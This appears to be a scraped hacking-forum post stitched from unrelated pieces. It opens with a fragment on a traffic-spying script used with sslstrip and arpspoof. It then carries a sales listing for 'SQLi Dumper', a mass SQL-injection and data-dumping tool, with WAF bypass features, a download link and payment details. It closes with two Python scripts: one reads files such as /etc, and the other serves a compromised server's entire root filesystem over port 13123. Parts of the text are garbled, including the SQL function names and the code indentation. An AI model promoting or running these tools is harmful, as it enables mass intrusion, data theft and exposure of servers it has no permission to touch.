Works on linux as a root user , combinied with sslstrip and arpspoof.
Idea of the script it's simply to spy traffic over your network connected devices.
The can be found on github Juli
And this is the offical blog post of Juli Script
Designed to be automated to find and exploit
web security vulnerabilities in mass.It is robust,
works in the background threads and is super faster. Uses an advanced search engine with seven
different online search services
(Google, Yandex, Bing, Yahoo, Sapo, Altavista and Terravista).
SQLi Dumper Features:
-Suports Multi. Online search engine (to find the trajects);
-Automated exploiting and analizing from a URL list;
-Automated search for data in a bulk URL list;
-Automated analizer for injections points using
URL, POST, Cookies, UserLogin or UserPassword;
-Dumper suports dumping data with multi-threading
(databases/tables/columns/fetching data);
-Exploiter suports up to 100x threads;
-Analizer and Dumper suports up to 50x threads;
-Advanced WAF bypass methods;
-Advanced custom query box;
-Dumper can dump large amounts of data, with greats
control of delay each request (multi-threading);
-Easy switch vulnerabilities to vulnerabilities;
-Suports proxies list;
-GeoIP database;
-Internal database;
-Trash System;
-Admin login finder;
-Hash online cracker;
-Reverse IP;
-Standalone .exe (no install).
SQL Injection Methods suported:
- MySQL
- Union (Integer / String)
- Error (Integer / String)
** Error Methods:
- Double Query
- XPATH - ExtractValue
- XPATH - UpdateXML
- Brute Forcing
- Blind
- Load File
- Load File Scanner
** Illegal Mix Of Collations:
- UnHexHex()
- Binary()
- Cast As Char
- Compress(Uncompress())
- Convert Using utf8
- Convert Using latin1
- Aes_decrypt(aes_encrypt())
- MS SQL
- Union (Integer / String)
- Error (Integer / String)
** Illegal Mix Of Collations:
- SQL_Latin1;
- Cast As Char.
- Oracle
- Union (Integer / String)
- Error (Integer / String)
** Error Methods:
- GET_HOST_ADDRESS
- DRITHSX.SN
- GET;APPINGXPATH.
** Illegal Mix Of Collations:
- Cast As Char.
** Suports TOP N Types:
- ROWUM
- RANK()
- DESE_RANK()
** Analizer detects also:
- MS Access
- PostgredSQL
- Sybase
** For using this tool you should know a little
about SQL Injections.
Demo Version Limitations:
- Max. URL per Search 500
- Get links by ReverseIP DISABLED
- Max. Trash 5000 URLs
- SQL Injection Obfuscate - Bypass Functions and
Keywords Filtering DISABLED
- Exploiter Max. Threads 20
- Analizer Max. Threads 3
- Running multiples instancies DESABLED
- Running multiples mini dump instancies DESABLED
- Dumping Rows with multi-threading DESABLED
- Network Credential DISABLED
- Injection Methods for POST, Cookies, etc.. DESABLED
- Proxy DISABLED
- ReverseIP DISABLED
- Load_File() scanner DISABLED
** Download: http://www.mediafire.com/?vfb8fps2beppsib
** Dependencies: Microsoft .NET Framework 4.x
http://www.microsoft.com/en-us/download/details.aspx?id=17851
Price and Payment Method:
- Binary (EXE): 150 USD / 115€ Euro
- Source Code (VB.NET 2010): 2.000 USD / 1.550€ Euro
** Liberty Reserve
Contacts:
- mysqlidumper [at] gmail [dot] com (email)
- c4rl0s@jabber.org (IM Chat)
More Screen Shots:
http://imageshack.us/a/img40/9792/54476110.png
http://imageshack.us/a/img26/7343/43570486.png
http://imageshack.us/a/img833/1754/29794037.png
http://imageshack.us/a/img838/5985/62974282.png
http://imageshack.us/a/img405/2636/41411581.png
http://imageshack.us/a/img253/7108/87770469.png
http://imageshack.us/a/img845/5708/27459044.png
http://imageshack.us/a/img253/4696/23767618.png
http://imageshack.us/a/img338/4593/86695223.png
http://imageshack.us/a/img689/1859/84670334.png
http://imageshack.us/a/img692/4218/79948522v.png
http://imageshack.us/a/img571/690/48570647.png
http://imageshack.us/a/img27/8163/19180735.png
http://imageshack.us/a/img823/6977/14995786.png
http://imageshack.us/a/img443/4640/60463828.png
http://imageshack.us/a/img841/9392/43723692.png
http://imageshack.us/a/img20/8374/86406807.png
http://imageshack.us/a/img221/7549/38372480.png
http://imageshack.us/a/img16/1558/76135157.png
http://imageshack.us/a/img411/1913/97064053.png
http://imageshack.us/a/img208/1747/83970473.png
http://imageshack.us/a/img840/6143/78458462.png
http://imageshack.us/a/img268/5611/96006062.png
http://imageshack.us/a/img253/3442/47787419.png
http://imageshack.us/a/img849/4741/14173095.png
http://imageshack.us/a/img191/1821/61869828.png
Max. URL per Search 500if you bought the v. 4.x
Get links by ReverseIP DISABLED
Max. Trash 5000 URLs
SQL Injection Obfuscate - Bypass Functions and Keywords Filtering DISABLED
Exploiter Max. Threads 20
Analizer Max. Threads 3
Network Credential DISABLED
Proxy DISABLED
ReverseIP DISABLED
Blinder are disabled in DEMO EDITION, you can check the Version() only for a demo :)
Load_File() scanner DISABLED
#!/usr/bin/env python
# devilzc0de.org (c) 2012
import sys
import os
def copyfile(source, dest, buffer_size=1024*1024):
if not hasattr(source, 'read'):
source = open(source, 'rb')
if not hasattr(dest, 'write'):
dest = open(dest, 'wb')
while 1:
copy_buffer = source.read(buffer_size)
if copy_buffer:
dest.write(copy_buffer)
else:
break
source.close()
dest.close()
if __name__=="__main__":
if not len(sys.argv) == 3 and not len(sys.argv) == 2:
sys.stdout.write('usage : python ' + os.path.basename(sys.argv[0]) + ' [path to dir/file] [path to save file]\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue issue_new_copy\r\n')
sys.exit(1)
target = sys.argv[1].replace("\\","/")
if os.path.isdir(target):
if not target.endswith("/"):
target = target + "/"
dir = os.listdir(target)
for d in dir:
fs = ""
if os.path.isdir(target + d):
fs = "[ DIR ]"
elif os.path.isfile(target + d):
fs = os.path.getsize(target + d)
fs = str(fs)
sys.stdout.write(fs.rjust(12, " ") + " " + d + "\r\n")
elif os.path.isfile(target):
if len(sys.argv) == 3:
copyfile(target, sys.argv[2])
else:
f = open(target, "rb")
try:
byte = f.read(1024)
sys.stdout.write(byte)
sys.stdout.flush()
while byte != "":
byte = f.read(1024)
sys.stdout.write(byte)
sys.stdout.flush()
finally:
f.close()
else:
sys.stdout.write("Can't found file or folder : " + target)
python -hNow take this python script and name it as webs.py , It's a little python script who will open a new port on server SimpleHTTPServer ( python ) module. Default port from script it's 13123 .
http://pastebin.com/PddvszKC#!/usr/bin/env python # devilzc0de.org (c) 2012 import SimpleHTTPServer import SocketServer import os port = 13123 if __name__=='__main__': os.chdir('/') Handler = SimpleHTTPServer.SimpleHTTPRequestHandler httpd = SocketServer.TCPServer(("", port), Handler) print("Now open this server on webbrowser at port : " + str(port)) print("example: http://maho.com:" + str(port)) httpd.serve_forever()
python webs.py